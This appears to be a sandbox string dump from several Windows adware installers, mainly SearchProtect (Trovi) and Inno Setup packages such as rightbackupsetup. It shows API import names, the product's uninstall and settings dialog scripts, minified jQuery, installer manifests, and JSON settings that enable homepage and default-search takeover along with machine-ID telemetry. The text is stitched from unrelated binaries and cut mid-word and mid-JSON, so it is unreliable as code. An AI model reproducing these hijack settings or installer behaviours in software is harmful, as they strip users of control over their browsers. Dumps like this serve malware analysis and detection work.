.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
!\%u{<script type="text/javascript" src="../Libs/json2.min.js"></script>
<script type="text/javascript" src="../Libs/jquery.1.7.1.min.js"></script>
<script type="text/javascript" src="../Libs/SPDialogApi.js"></script>
<script type="text/javascript" src="defaults.js"></script>
<script type="text/javascript" src="../Libs/dialogUtils.js"></script>
<script type="text/javascript" src="uninstall.js"></script>
jQuery(document).ready(function () {UninstallDialog.init();
$("." sClass).removeClass(sClass);var id = $elm.attr('id');$('#' id 'Label').addClass(sClass);$("#chkRevertLabel").addClass('checked');$("#chkRevertLabel").removeClass('checked');var data = JSAPI.GetData();
data = DEFAULTS.uninstallData;
oTexts = JSAPI.GetTranslationTable();
oTexts = DEFAULTS.translationTable;
DialogUtils.renderTexts(oTexts);
var userChoice = $('input:radio[name=BeforeUninstallRadios]:checked').val()$("#BeforeUninstallView").hide();$("#BeforeUninstallfooter").hide();$("#radioCurrentHomepage").checked = true;$("#radioCurrentHomepageLabel").addClass("checked")$("#searchSettingsView").fadeIn(250);$("#searchSettingsfooter").fadeIn(250);$("#uninstallView").fadeIn(250);$("#uninstallfooter").fadeIn(250);.on('focus', function () {.on('change', function () {.on('blur', function () {.on('click', function () {setRevertCheckboxState(this.checked);
$("#btnNext").on('click', function () {$("#btnClose").on('click', function () {reportData("close_x");$("#btnApply").on('click', function () {reportData("keep_protecting");$("#btnUninstall").on('click', function () {reportData("uninstall");$("#btnCancel").on('click', function () {reportData("Cancel");$("#header").on('mousedown', function (e) {if (e.target.id == "btnClose") {external.DragWindow();
$(document).on("contextmenu", function (e) {e.preventDefault();
// report dialog data using setData and close window (by default)
function reportData(userChoice, bRemainOpen) {data.userAction = userChoice;
JSAPI.SetData(data);
var userSelection = $('input:radio[name=homepageRadios]:checked').val(),revert = $('#chkRevert').is(':checked');revert: revert.toString()
DialogUtils.fadeOut(150, function () {external.Close();
$("#uninstallDisclaimer").hide();external.SetOpacity(0);
external.Show(467, 293);
DialogUtils.fadeIn(150);
var funcParams = JSON.parse(JSON_FUNCTION_TEMPLATE);
funcParams.funcId = APIFunctionsEnum.FUNC_HIDE;
var result = external.InvokeFunction(JSON.stringify(funcParams));
funcParams.funcId = APIFunctionsEnum.FUNC_SHOW;
funcParams.funcId = APIFunctionsEnum.FUNC_CLOSE;
window.JSAPI = window.JSAPI || {};JSAPI.Hide = Hide;
JSAPI.Show = Show;
JSAPI.Close = Close;
//Begins with 50 in order to let the APIFunctionsEnum ( from the HtmlControl.js ) extend without breaking the synch with
self.APISPFunctionsEnum = {funcParams.funcId = APISPFunctionsEnum.FUNC_GET_TRANSLATION_TABLE;
var result = JSON.parse(external.InvokeFunction(JSON.stringify(funcParams)));
funcParams.funcId = APISPFunctionsEnum.FUNC_GET_DATA;
funcParams.funcId = APISPFunctionsEnum.FUNC_SET_DATA;
funcParams.data = data;
funcParams.funcId = APISPFunctionsEnum.FUNC_IS_RTL;
function NavigateInBrowser(url) // default browser
funcParams.funcId = APISPFunctionsEnum.FUNC_NAVIGATE_IN_BROWSER;
funcParams.url = url;
JSAPI.GetTranslationTable = GetTranslationTable;
JSAPI.GetData = GetData;
JSAPI.SetData = SetData;
JSAPI.IsRTL = IsRTL;
JSAPI.NavigateInBrowser = NavigateInBrowser;
href="hXXp://info.trovi.com/Eula">License agreement</a>
<script type="text/javascript" src="../libs/json2.min.js"></script>
<script type="text/javascript" src="../libs/jquery.1.7.1.min.js"></script>
<script type="text/javascript" src="../libs/SPDialogApi.js"></script>
<script type="text/javascript" src="settings.js"></script>
SettingsDialog.init();
htmlTextbox = '<div class="txtOtherWrapper"><input class="txtOther" type="text" value="" data-ghost-text="hXXp://" /></div>';
function saveSettings(sSettingsType, iSelectedIndex, sOtherUrl) {spData[sSettingsType].LastSelected = iSelectedIndex;
spData[sSettingsType].otherUrl = sOtherUrl;
JSAPI.SetData(oSettings);
.on('click', 'a.radio', function () {.on('click', 'a.browserLink', function (e) {e.preventDefault();
var url = $(this).attr('href');JSAPI.NavigateInBrowser(url);
.on('focus', ".txtOther", function () {if ($txtbox.val() == $txtbox.data('ghost-text')) {$txtbox.val('').css('color', '#51515a');.on('blur', ".txtOther", function () {if ($txtbox.val() == '') {$txtbox.val($txtbox.data('ghost-text')).css('color', '#9f9fa3');.on('click', function () {setErrorPageCheckboxState(this.checked);
$(".menuEntrySelectable").on('click', function () {var sectionName = $(this).attr('id').replace('menuEntry', '');$('.btnApply').on('click', function () {var settingType = $(this).parents('.content').attr('id').replace('content', '');$(this).trigger('blur'); // remove the outline, which only shows inside the SP dialog box (but not in regular IE)$("#btnClose").on('click', function (e) {e.stopPropagation();
//$("#container").fadeOut(150, function () {$(".content").hide(); // SP dialog container workaroundexternal.Close();
$(this).show();
$("#chkErrorPageLabel").addClass('checked');$("#chkErrorPageLabel").removeClass('checked');$(".menuEntrySelected").removeClass('menuEntrySelected');$("#menuEntry" sectionName).addClass('menuEntrySelected');$(".content").hide();$("#content" sectionName).show();if ($elm.hasClass('.radioSelected')) {var $parent = $elm.parents('.content');var settingsType = $parent.attr('id').replace('content', '');$parent.find('.radioSelected').removeClass('radioSelected');$elm.addClass('radioSelected');if ($elm.data('isLast')) {$parent.find('.txtOtherWrapper').fadeIn(150);$parent.find('.txtOtherWrapper').hide();var $parentContainer = $("#content" sSettingsType).find(".contentMain");var nofOptions = oData.Options.length;
var $radioElement = $(htmlRadio).html(oData.Options[i]).data('index', i);if (oData.LastSelected == i) {$radioElement.addClass('radioSelected');$radioElement.data('isLast', 'true');$parentContainer.append($radioElement);
if (oData.OpenTextBoxForLast) {var $txtbox = $txtboxWrapper.children('.txtOther');$txtbox.val(oData.otherUrl || $txtbox.data('ghost-text'));$parentContainer.append($txtboxWrapper);
if ($parentContainer.children('.radioSelected').data('isLast')) {$txtboxWrapper.show();
$txtboxWrapper.trigger('blur');$parentContainer.find(".btnApply").show();for (var key in oTexts) {// Texts keys are either matched by IDs or classes
var $elm = $("#" key);if (!($elm.length)) {$elm = $("." key);$elm.html(oTexts[key]);
document.getElementById("chk" sSettingsType).checked = oData["Enabled"];spData[sSettingsType].Enabled = isEnabled;
var isEnabled = document.getElementById("chkErrorPage").checked;$("#content" sSettingsType).find('.successMessageWrapper').fadeIn(150);var $selectedOption = $settingParent.find('.radioSelected');var selectedIndex = parseInt($selectedOption.data('index'));// Get the supplied url
var otherUrl = '';
if ($selectedOption.data('isLast') && sSettingsType != "DefaultSearch") {var $txtbox = $settingParent.find('.txtOther');otherUrl = $txtbox.val();
// if the URL doesn't contain a schema, add default "hXXp://"
if (otherUrl.indexOf('://') == -1) {otherUrl = 'hXXp://' otherUrl;
$txtbox.val(otherUrl);
if (!verifyUrl(otherUrl)) {$settingParent.find('.errorMessageWrapper').fadeIn(150);saveSettings(sSettingsType, selectedIndex, otherUrl);
$settingParent.find('.successMessageWrapper').fadeIn(150);$('.errorMessageWrapper').hide();$(".successMessageWrapper").hide();function verifyUrl(value) {return /^(https?):\/\/(((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\ ,;=]|:)*@)?(((\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]))|((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.) (([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?)(:\d*)?)(\/((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\ ,;=]|:|@) (\/(([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\ ,;=]|:|@)*)*)?)?(\?((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\ ,;=]|:|@)|[\uE000-\uF8FF]|\/|\?)*)?(\#((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\ ,;=]|:|@)|\/|\?)*)?$/i.test(value);$(".radio, .txtOtherWrapper").remove();$(".btnApply").hide();$("#container").show(); //fadeIn(250);external.Show(638, 385);
external.SetTitle("Search Protect");.vAlignOuterContainer {.vAlignInnerContainer {.vAlignElement {-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
label.radio {label.radio.focused {label.radio .rdbImage {background: url('../Images/radio-button-def.png') 0 -2px no-repeat;label.radio.checked {label.radio.checked .rdbImage {background: url('../Images/radio-button-selected.png') 0 -2px no-repeat;label.checkbox {background: url('../Images/checkbox.png') 0 2px no-repeat;label.checkbox.checked {background: url('../Images/checkbox.png') 0 -22px no-repeat;label.checkbox.focused {label.checkbox div {a.button {padding: 0 !important;
a.button.btnSilver:hover, a.button.btnBlue:hover {background-position: 0 -30px !important;
a.button.btnSilver:active, a.button.btnBlue:active {background-position: 0 -60px !important;
a.button.btnSilver {background: url('../Images/btnSilver.png') 0 0 no-repeat !important;a.button.btnBlue {background: url('../Images/btnBlue.png') 0 0 no-repeat !important;color: white !important;
background: url('../Images/bg-uninstall.png') -1px -1px no-repeat;background: url('../Images/btnClose.png') 0 0 no-repeat;.heading {.radioButtonsWrapper {#settingsRadio label.radio{padding-top: 0px !important;
visibility: visible !important;
.radioText{.settingsRadio{height: 21px !important;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "w3.org/TR/html4/strict.dtd">
<link href="uninstall.css" type="text/css" rel="stylesheet"/>
})();});
</html>ing"&&(d.data=f.param(d.data,d.traditional)),b$(bT,d,c,v);if(s===2)return!1;t=d.global,d.type=d.type.toUpperCase(),d.hasContent=!bK.test(d.type),t&&f.active ===0&&f.event.trigger("ajaxStart");if(!d.hasContent){d.data&&(d.url =(bM.test(d.url)?"&":"?") d.data,delete d.data),k=d.url;if(d.cache===!1){var x=f.now(),y=d.url.replace(bQ,"$1_=" x);d.url=y (y===d.url?(bM.test(d.url)?"&":"?") "_=" x:"")}}(d.data&&d.hasContent&&d.contentType!==!1||c.contentType)&&v.setRequestHeader("Content-Type",d.contentType),d.ifModified&&(k=k||d.url,f.lastModified[k]&&v.setRequestHeader("If-Modified-Since",f.lastModified[k]),f.etag[k]&&v.setRequestHeader("If-None-Match",f.etag[k])),v.setRequestHeader("Accept",d.dataTypes[0]&&d.accepts[d.dataTypes[0]]?d.accepts[d.dataTypes[0]] (d.dataTypes[0]!=="*"?", " bX "; q=0.01":""):d.accepts["*"]);for(u in d.headers)v.setRequestHeader(u,d.headers[u]);if(d.beforeSend&&(d.beforeSend.call(e,v,d)===!1||s===2)){v.abort();return!1}for(u in{success:1,error:1,complete:1})v[u](d[u]);p=b$(bU,d,c,v);if(!p)w(-1,"No Transport");else{v.readyState=1,t&&g.trigger("ajaxSend",[v,d]),d.async&&d.timeout>0&&(q=setTimeout(function(){v.abort("timeout")},d.timeout));try{s=1,p.send(l,w)}catch(z){if(s<2)w(-1,z);else throw z}}return v},param:function(a,c){var d=[],e=function(a,b){b=f.isFunction(b)?b():b,d[d.length]=encodeURIComponent(a) "=" encodeURIComponent(b)};c===b&&(c=f.ajaxSettings.traditional);if(f.isArray(a)||a.jquery&&!f.isPlainObject(a))f.each(a,function(){e(this.name,this.value)});else for(var g in a)ca(g,a[g],c,e);return d.join("&").replace(bD," ")}}),f.extend({active:0,lastModified:{},etag:{}});var cd=f.now(),ce=/(\=)\?(&|$)|\?\?/i;f.ajaxSetup({jsonp:"callback",jsonpCallback:function(){return f.expando "_" cd }}),f.ajaxPrefilter("json jsonp",function(b,c,d){var e=b.contentType==="application/x-www-form-urlencoded"&&typeof b.data=="string";if(b.dataTypes[0]==="jsonp"||b.jsonp!==!1&&(ce.test(b.url)||e&&ce.test(b.data))){var g,h=b.jsonpCallback=f.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,i=a[h],j=b.url,k=b.data,l="$1" h "$2";b.jsonp!==!1&&(j=j.replace(ce,l),b.url===j&&(e&&(k=k.replace(ce,l)),b.data===k&&(j =(/\?/.test(j)?"&":"?") b.jsonp "=" h))),b.url=j,b.data=k,a[h]=function(a){g=[a]},d.always(function(){a[h]=i,g&&f.isFunction(i)&&a[h](g[0])}),b.converters["script json"]=function(){g||f.error(h " was not called");return g[0]},b.dataTypes[0]="json";return"script"}}),f.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){f.globalEval(a);return a}}}),f.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),f.ajaxTransport("script",function(a){if(a.crossDomain){var d,e=c.head||c.getElementsByTagName("head")[0]||c.documentElement;return{send:function(f,g){d=c.createElement("script"),d.async="async",a.scriptCharset&&(d.charset=a.scriptCharset),d.src=a.url,d.onload=d.onreadystatechange=function(a,c){if(c||!d.readyState||/loaded|complete/.test(d.readyState))d.onload=d.onreadystatechange=null,e&&d.parentNode&&e.removeChild(d),d=b,c||g(200,"success")},e.insertBefore(d,e.firstChild)},abort:function(){d&&d.onload(0,1)}}}});var cf=a.ActiveXObject?function(){for(var a in ch)ch[a](0,1)}:!1,cg=0,ch;f.ajaxSettings.xhr=a.ActiveXObject?function(){return!this.isLocal&&ci()||cj()}:ci,function(a){f.extend(f.support,{ajax:!!a,cors:!!a&&"withCredentials"in a})}(f.ajaxSettings.xhr()),f.support.ajax&&f.ajaxTransport(function(c){if(!c.crossDomain||f.support.cors){var d;return{send:function(e,g){var h=c.xhr(),i,j;c.username?h.open(c.type,c.url,c.async,c.username,c.password):h.open(c.type,c.url,c.async);if(c.xhrFields)for(j in c.xhrFields)h[j]=c.xhrFields[j];c.mimeType&&h.overrideMimeType&&h.overrideMimeType(c.mimeType),!c.crossDomain&&!e["X-Requested-Wit;74/, (%#
~{xrpfa\ZSM@;3-%U<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"></assemblyIdentity><description>Nullsoft Install System v2.46.1-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS></application></compatibility></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXverifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn67.tmp\SPtool.dll
"browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3317919","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"1407936689169","profile_number":"1","user_number":"1",NBSP"installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB",NBSP"download_length":NBSP4031,NBSP"install_type":NBSP"install",NBSP"result":NBSP"SP_RESULT",NBSP"reason":NBSP"SP_FAIL_REASON","v_env_tests":"V_ENV_TESTS_ALIAS","v_env_codes":"V_ENV_CODES_ALIAS","channel_id":NBSP"",NBSP"brand":NBSP"SP"NBSP,NBSP"previous_brand":"",NBSP"brand_install_type":"","extra_info":"","Experiment":"","Variant":""}
20140813163129.419 , END - .onInit
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn67.tmp\SPtool.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn67.tmp
4.exe
\nsn67.tmp
CltMngSvc.exe
CLTMNG~1.EXE
C:\PROGRA~1\SearchProtect\UI\*.*
ddress" : "false", "test_parameter" : "", "qa" : "false", "locale" : "", "installation_session_id" : "M5BC16161-589A-4851-BD46-F690E029EDAB", "source" : "install"}
140813163138.138
%Documents and Settings%\%current user%\Local Settings\Application Data
n/bin/CltMngSvc.exe"}
ersion":"2.16.20.192","OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)","OS_version":"5.1","browser":"InternetExplorer","browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3317919","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"SP_SEQUENCE_TIMESTAMP","profile_number":"1","user_number":"1", "installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB", "download_length": 4031, "install_type": "install", "result": "SP_RESULT", "reason": "SP_FAIL_REASON","v_env_tests":"V_ENV_TESTS_ALIAS","v_env_codes":"V_ENV_CODES_ALIAS","channel_id": "", "brand": "SP" , "previous_brand":"", "brand_install_type":"","extra_info":"","Experiment":"","Variant":""}
0813163138.138
plication Data\SearchProtect\SearchProtect\STG\Init_6C.tmp
: "", "carrier_version" : "", "defaultsearch" : "true", "platform" : "ie", "startpage" : "true", "newtab" : "true", "searchfromaddress" : "false", "test_parameter" : "", "qa" : "false", "locale" : "", "installation_session_id" : "M5BC16161-589A-4851-BD46-F690E029EDAB", "source" : "install"}
tid", "carrier_id" : "CT3317919", "carrier_userid" : "", "carrier_UM" : "", "carrier_version" : "", "defaultsearch" : "true", "platform" : "ie", "startpage" : "true", "newtab" : "true", "searchfromaddress" : "false", "test_parameter" : "", "qa" : "false", "locale" : "", "installation_session_id" : "M5BC16161-589A-4851-BD46-F690E029EDAB", "source" : "install"}
mestamp":"1407936689169","profile_number":"1","user_number":"1",NBSP"installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB",NBSP"download_length":NBSP4031,NBSP"install_type":NBSP"install",NBSP"result":NBSP"SP_RESULT",NBSP"reason":NBSP"SP_FAIL_REASON","v_env_tests":"V_ENV_TESTS_ALIAS","v_env_codes":"V_ENV_CODES_ALIAS","channel_id":NBSP"",NBSP"brand":NBSP"SP"NBSP,NBSP"previous_brand":"",NBSP"brand_install_type":"","extra_info":"","Experiment":"","Variant":""}
16161-589A-4851-BD46-F690E029EDAB
MngSvc.exe
Key" : "installation_session_id_ie","RepositoryValue" : "M5BC16161-589A-4851-BD46-F690E029EDAB","JsonType" : "1"}
.qatrovi.com
search", "keyword": "trovi.search", "suggestedUrl": "hXXp://suggest.seccint.com/CSuggestJson.ashx?prefix={searchTerms}", "PreviousBrandDsEngineData": {"name": "Conduit Search", "keyword": "conduit.search"}, "DSEngineChange": "true", "iconPath": "", "suggestedQaUrl": "hXXp://suggest.qaseccint.com/CSuggestJson.ashx?prefix={searchTerms}", "description": "Trovi search"}"C:/DOCUME~1/adm/LOCALS~1/Temp/nsn60.tmp" -carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031
C:\PROGRA~1\SearchProtect
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsn60.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm65.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn60.tmp
C:\PROGRA~1\SearchProtect\UI\dialogs
Microsoft Windows XP Professional Service Pack 3 (build 2600)
carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031
CUME~1/adm/LOCALS~1/Temp/nsn60.tmp" -carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031
%Program Files%\SearchProtect
SPB5A95F48-BAA3-4EC2-B11B-A1C0EE0BC45C
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse69.exe
2.16.20.192
D - SetRepositoryKey
PPackNBSP3NBSP(buildNBSP2600)","OS_version":"5.1","browser":"InternetExplorer","browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3317919","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"1407936689169","profile_number":"1","user_number":"1",NBSP"installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB",NBSP"download_length":NBSP4031,NBSP"install_type":NBSP"install",NBSP"result":NBSP"SP_RESULT",NBSP"reason":NBSP"SP_FAIL_REASON","v_env_tests":"V_ENV_TESTS_ALIAS","v_env_codes":"V_ENV_CODES_ALIAS","channel_id":NBSP"",NBSP"brand":NBSP"SP"NBSP,NBSP"previous_brand":"",NBSP"brand_install_type":"","extra_info":"","Experiment":"","Variant":""}
M5BC16161-589A-4851-BD46-F690E029EDAB
{"InstallerSettings":{"CHExtension_Id":null,"CHExtension_LandingPage":null,"CHExtension_Name":null,"DEFAULT_CMD":"-carrier_type=CTID -carrier_id=CT3331172 -Platform=all -startpage=true -defaultsearch=true -install_time_revert=true","DUM":"2","InstallSPPDriver":null,"IsAUAllowednoTB":"true","LOST_USERS":"false","PING":"false","SERVICE_LOST_USERS":null,"TbExternalAssetsEnable":"true","UNINSTALL_PING":"false"},"AbTestSettings":{"Experiment":"","Variant":"","TestParameter":""},"CarrierSettings":{"CHExtensionMode":"false","v_env":"true","v_env_10":"true","v_env_12":"false"},"signature":"PPJUtVBuf3mq4bSjHfCsPw0GVGgp99IghgIBJ9ghQyHjTCEGgcsEffb099GrCK7NwFnh16V1V6GO1QUTahcxWN9Saw2WlvY KWSHhWpPzWwBcHSyChLzrmENQcLwfqx00VEJYOFQfuJlUaRc7cOOrUha8SZCLWiPBJ6S2ajhIuA="}Windows XP Professional Service Pack 3 (build 2600)
rightbackupsetup.exe_3220:
.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
;0"!:/#!:/#!:/#!:/#!:/#!:/#!:/#!:/#!:/#!:.#!<1"!7,
KWindows
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
2.1.1000.4398
AdvancedSystemProtector.exe_640_rwx_654D9000_00004000:
].elm.e,`.e
g.e`Q.exf.eh^.e
e.e0X.e e.e\`.epd.e
].eHc.e
rightbackupsetup.tmp_3308:
.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
Uh.xB
EInvalidGraphicOperation
UhU%C
Uh%.C
PasswordChart
OnKeyDownTME
OnKeyPress
OnKeyUpPLE
ssHorizontal
OnKeyUp
TCustomButton.TButtonStyle
AutoHotkeysP
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
EXPORT
TPSExec
TPSRuntimeClassImporterPkP
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
OnKeyUptKE
Uh.pJ
t.Htb
Uh.kK
1.2.1
TPasswordEdit
PasswordEdit(
Passwordt
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
Uh.cL
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
